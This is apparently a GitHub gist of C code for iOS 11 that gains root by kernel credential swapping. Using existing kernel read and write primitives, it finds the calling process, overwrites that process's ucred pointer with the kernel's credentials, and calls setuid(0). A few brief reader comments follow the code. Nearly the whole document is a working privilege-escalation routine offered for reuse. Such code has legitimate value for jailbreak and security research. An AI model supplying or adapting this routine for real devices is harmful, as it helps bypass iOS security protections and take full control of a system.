get uid: 0 - iOS 11

gistfile1.txt

// gets uid 0 (iOS 11)
// add patchfinder and you should be good
// Abraham Masri @cheesecakeufo



/*
 * Purpose: iterates over the procs and finds our proc
 */
uint64_t get_our_proc() {
    
    uint64_t task_self = task_self_addr();
    uint64_t struct_task = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    
    
    while (struct_task != 0) {
        uint64_t bsd_info = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
        
        // get the process pid
        uint32_t pid = rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
        
        if(pid == getpid()) {
            return bsd_info;
        }
        
        struct_task = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV));
    }
    return -1; // we failed :/
}

kern_return_t get_root () {
    
    kern_return_t ret = KERN_SUCCESS;
 
    uint64_t our_proc = get_our_proc();
    
    if(our_proc == -1) {
        printf("[ERROR]: no our proc. wut\n");
        ret = KERN_FAILURE;
        return ret;
    }
    
    extern uint64_t kernel_task;
    printf("[INFO]: kernel_task: %llx\n", kernel_task); // BSD_INFO
    
    uint64_t kern_ucred = kread_uint64(kernel_task + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */);
    printf("[INFO]: kern_ucred: %llx\n", kern_ucred);
    
    uint64_t offsetof_p_csflags = 0x2a8;
    
    uint32_t csflags = kread_uint32(our_proc + offsetof_p_csflags);
    
    uint64_t our_cred = kread_uint64(our_proc + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */);
    
    kwrite_uint64(our_proc + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */, kern_ucred);
    
    
    printf("[INFO]: successfully wrote our kern_ucred into our cred!\n");
    
    setuid(0);
    printf("[INFO]: getuid: %d\n", getuid());
    int fd = open("/var/mobile/xxx", O_WRONLY);

    // you'll probably panic few seconds after this thanks to the new sandbox protections
    
    return ret;
}

Will this be made into a API?

What even is this

Stop lowering the IQ of this place.